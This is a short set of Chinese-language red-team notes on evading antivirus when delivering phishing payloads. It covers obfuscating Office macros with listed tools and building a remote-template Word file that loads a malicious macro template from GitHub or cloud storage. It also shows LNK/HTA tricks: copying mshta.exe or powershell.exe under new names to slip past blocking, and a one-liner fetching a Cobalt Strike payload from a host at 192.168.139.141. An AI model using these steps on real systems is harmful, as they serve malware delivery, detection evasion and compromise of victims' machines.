➢ 红队APT-文件后缀-Office分离

➢ 红队APT-免杀方案-CHM&LNK

➢ 红队APT-免杀方案-自解压&捆绑

免杀方案：

#Office文档

代码混淆

https://github.com/Pepitoh/VBad

https://github.com/outflanknl/EvilClippy

https://github.com/Accenture/Codecepticon

https://github.com/bobby-tablez/VBScrambler

 

分离加混淆

1、制作包含宏的恶意模版文件（.dotm）。

2、将恶意模版文件上传至服务器。如Github等公共文件平台。

3、新建并保存一个使用任意模版的docx文件。

解压docx文件，修改 word\_rels\settings.xml.rels文件的Target属性，将其指向部署恶意模版文件的服务器。

4、使用zip格式压缩文件，并重新命名后缀为docx。

5、重新打开docx文件，并启用宏。

 

做好生成的宏代码的混淆，制作好模版，上传至OSS，Github等公共文件平台

本地创建加载模版的文件，修改加载地址，远程加载混淆后的模版宏文件上线！

 

#LNK快捷方式

代码混淆+绕过文件监控

https://github.com/bobby-tablez/VBScrambler

CS生成的hta是vba代码模式 

解决1：mshta拦截

copy C:\Windows\System32\mshta.exe ms.exe

ms http://192.168.139.141:99/download/file.ext

C:\Windows\System32\cmd.exe /c copy C:\Windows\System32\mshta.exe ms.exe & ms http://192.168.139.141:99/download/file.ext ---- 火绒要是弄到内存里面查杀几率比较小 所以远程加载不会挂

解决2：vba混淆

https://github.com/bobby-tablez/VBScrambler

注意：生成出来后前后要加上html调用代码

 

CS生成的hta是powershell代码模式： 

解决1：mshta拦截

C:\Windows\System32\cmd.exe /c copy C:\Windows\System32\mshta.exe ms.exe & ms xxxx

解决2：powershell拦截

cmd /c copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p.exe & p.exe xxxxx

 

#自解压&捆绑打包

宿主文件免杀处理